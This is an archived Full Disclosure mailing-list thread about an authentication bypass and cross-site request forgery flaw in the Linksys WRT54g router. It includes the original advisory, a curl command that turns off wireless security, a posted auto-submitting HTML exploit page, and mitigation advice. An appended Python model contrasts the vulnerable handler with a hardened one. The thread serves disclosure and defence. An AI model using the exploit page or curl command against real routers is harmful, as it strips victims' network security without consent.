Full Disclosure mailing list archives
Re: linksys WRT54g authentication bypass
From: "Rob Thompson" <my.security.lists () gmail com>
Date: Fri, 10 Nov 2006 15:04:56 -0800
The firmware listed in the post is very old firmware and should no longer be affected if you update to the more current release, 4.71.1. Also, I would recommend checking out Thibor's release instead. It's a much more robust release. http://www.thibor.co.uk

Hope that this helps out a little bit.

Rob.

On 11/4/06, pagvac <unknown.pentester () gmail com> wrote:

Sorry I'm replying to this post after so long, but I was bored this morning and decided to create a specially-crafted HTML page that would allow me to replicate the unauth CSRF attack described by Ginsu Rabbit. Very interesting vuln btw :-)

The following is the code for the specially-crafted HTML page. Unfortunately, I do not have a vulnerable Linksys router to test this, so I simply strictly followed the structure of the POST request as described in the advisory. Hopefully it should work. It'd be cool if someone could test this against a vulnerable model.

Here is an on-line copy: http://ikwt.com/projects/linksys/BID19347_test.html

<html>
<head><title>BID 19347 specially-crafted html page - vuln found by Ginsu Rabbit</title></head>
<body>
<form action="http://192.168.0.1/Security.tri" method="POST">
<input type="hidden" name="SecurityMode" value="0">
<input type="hidden" name="layout" value="en">
</form>
<script>document.forms[0].submit();</script>
</body>
</html>

On 8/4/06, Ginsu Rabbit <ginsurabbit () hotmail com> wrote:

I'm having some trouble believing this hasn't been reported before. If you have a Linksys router handy, please check to see whether it is vulnerable to this attack. It's possible that all of the Linksys router web UIs have the same bug. Hopefully the problem is isolated to one particular model or firmware revision.

I. DESCRIPTION

Tested product: Linksys WRT54g home router, firmware revision 1.00.9.

Problem #1: No password validation for configuration settings.

The WRT54g does not attempt to verify a username and password when configuration settings are being changed. If you wish to read configuration settings, you must provide the administrator ID and password via HTTP basic authentication. No similar check is done for configuration changes.

This request results in a user-id and password prompt:

GET /wireless.htm

This request disables wireless security on the router, with no password prompt:

POST /Security.tri
Content-Length: 24

SecurityMode=0&layout=en

Problem #2: Cross-site request forgery

The web administration console does not verify that the request to change the router configuration is being made with the consent of the administrator. Any web site can force a browser to send a request to the Linksys router, and the router will accept the request.

II. EXPLOITATION

The combination of these two bugs means that any internet web site can change the configuration of your router. Recently published techniques for port-scanning and web server fingerprinting via Java and JavaScript make this even easier.

The attack scenario is as follows:

- intranet user visits a malicious web site
- malicious web site returns specially crafted HTML page
- intranet user's browser automatically sends a request to the router that enables the remote administration interface
- the owner of the malicious web site now has complete access to your router

I'm not going to share the "specially crafted HTML page" at this time, but it isn't all that special.

III. DETECTION

If your router is vulnerable, the following curl command will disable wireless security on your router. Tests for other router models and firmware revisions may be different:

curl -d "SecurityMode=0&layout=en" http://192.168.0.1/Security.tri

IV. MITIGATION

1) Make sure you've disabled the remote administration feature of your router. If you have this "feature" enabled, anybody on the internet can take control of the router.

2) Change the IP address of the router to a random value, preferably in the range assigned to private networks. For example, change the IP address to 10.x.y.z, where x, y, and z are numbers between 0 and 255 inclusive. This makes it more difficult for an attacker to forge the request necessary to change the router configuration. This mitigation technique might not help much if you have a Java-enabled browser, because of recently published techniques for determining gateway addresses via Java applets.

3) Disable HTTP access to the administration interface of the router, allowing only HTTPS access. Under most circumstances, this will cause the browser to show a certificate warning before the configuration is changed.

V. VENDOR NOTIFICATION

Linksys customer support was notified on June 24, 2006. Full disclosure on August 4, 2006.

-- GR

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

-- pagvac [http://ikwt.com/]

-- Rob
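The following is an added example, not code from this thread, from Linksys or from any firmware: a small Python model of the two problems Ginsu Rabbit describes (credentials demanded for GET pages only, and no check that a POST to Security.tri originated from the administrator), placed next to a hypothetical hardened handler. The router address, the admin credentials, the csrf_token field name and the Origin/Referer check are assumptions made for the model; the request shapes follow the advisory and pagvac's page.

```python
import base64
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Constructed values for this model only (assumptions, not the router's real settings).
ROUTER_HOST = "192.168.0.1"
ADMIN_USER = "admin"
ADMIN_PASS = "s3cret-example"


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    body: str = ""


def parse_form(body: str) -> dict:
    """Split a body such as 'SecurityMode=0&layout=en' into a dict."""
    form = {}
    for item in body.split("&"):
        key, sep, value = item.partition("=")
        if sep:
            form[key] = value
    return form


def basic_auth_header(user: str, password: str) -> str:
    """Build the Authorization header a browser sends for HTTP Basic auth."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def basic_auth_ok(headers: dict) -> bool:
    """Validate HTTP Basic credentials against the admin account (constant-time compare)."""
    value = headers.get("Authorization", "")
    if not value.startswith("Basic "):
        return False
    try:
        user, _, password = base64.b64decode(value[6:]).decode().partition(":")
    except ValueError:  # bad base64 or bad UTF-8
        return False
    return (hmac.compare_digest(user.encode(), ADMIN_USER.encode())
            and hmac.compare_digest(password.encode(), ADMIN_PASS.encode()))


def vulnerable_handler(req: Request):
    """Models the behaviour the advisory reports for firmware 1.00.9:
    reading a page needs credentials, but a POST to Security.tri is applied unchecked."""
    if req.method == "GET":
        return (200, {}) if basic_auth_ok(req.headers) else (401, {})
    if req.method == "POST" and req.path == "/Security.tri":
        form = parse_form(req.body)
        return 200, {"SecurityMode": form.get("SecurityMode")}
    return 404, {}


_csrf_tokens = set()  # tokens the admin UI embedded in forms it served


def issue_csrf_token() -> str:
    """Token the UI would embed in its own forms; a cross-site page cannot read it."""
    token = secrets.token_hex(16)
    _csrf_tokens.add(token)
    return token


def same_origin(headers: dict) -> bool:
    """Require an Origin (or, failing that, Referer) header naming the router itself.
    Fails closed: a request carrying neither header is rejected."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return parts.scheme in ("http", "https") and parts.hostname == ROUTER_HOST


def hardened_handler(req: Request):
    """Hypothetical fix (assumption, not a vendor patch): authenticate every request,
    and for state changes also require same-origin provenance and a valid CSRF token."""
    if not basic_auth_ok(req.headers):
        return 401, {}
    if req.method == "GET":
        return 200, {}
    if req.method == "POST" and req.path == "/Security.tri":
        if not same_origin(req.headers):
            return 403, {"reason": "cross-site request"}
        token = parse_form(req.body).get("csrf_token", "").encode()
        if not any(hmac.compare_digest(token, t.encode()) for t in _csrf_tokens):
            return 403, {"reason": "missing or invalid CSRF token"}
        return 200, {"SecurityMode": parse_form(req.body).get("SecurityMode")}
    return 404, {}


def forged_request(cached_auth: bool = False) -> Request:
    """What the browser sends after loading pagvac's page from an attacker's site.
    With cached_auth=True the browser replays Basic credentials it already holds,
    which is why requiring auth on POST alone does not stop the attack."""
    headers = {"Origin": "http://attacker.example",
               "Content-Type": "application/x-www-form-urlencoded"}
    if cached_auth:
        headers["Authorization"] = basic_auth_header(ADMIN_USER, ADMIN_PASS)
    return Request("POST", "/Security.tri", headers, "SecurityMode=0&layout=en")


if __name__ == "__main__":
    print("vulnerable, no creds :", vulnerable_handler(forged_request()))
    print("hardened, no creds   :", hardened_handler(forged_request()))
    print("hardened, cached auth:", hardened_handler(forged_request(cached_auth=True)))
```

Two points the model makes concrete: the vulnerable handler accepts the forged POST with no credentials at all, matching the curl test in the advisory; and even once authentication is enforced on POST, a browser that still holds cached Basic credentials will attach them to the forged request, so the CSRF defence (origin check plus a token the attacker's page cannot read) is what actually closes the hole. Note that browsers of the advisory's era did not send Origin, and Referer may be stripped; the check above deliberately rejects requests with neither header rather than letting them through.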
Current thread:
- Re: linksys WRT54g authentication bypass pagvac (Nov 04)
- Re: linksys WRT54g authentication bypass Rob Thompson (Nov 10)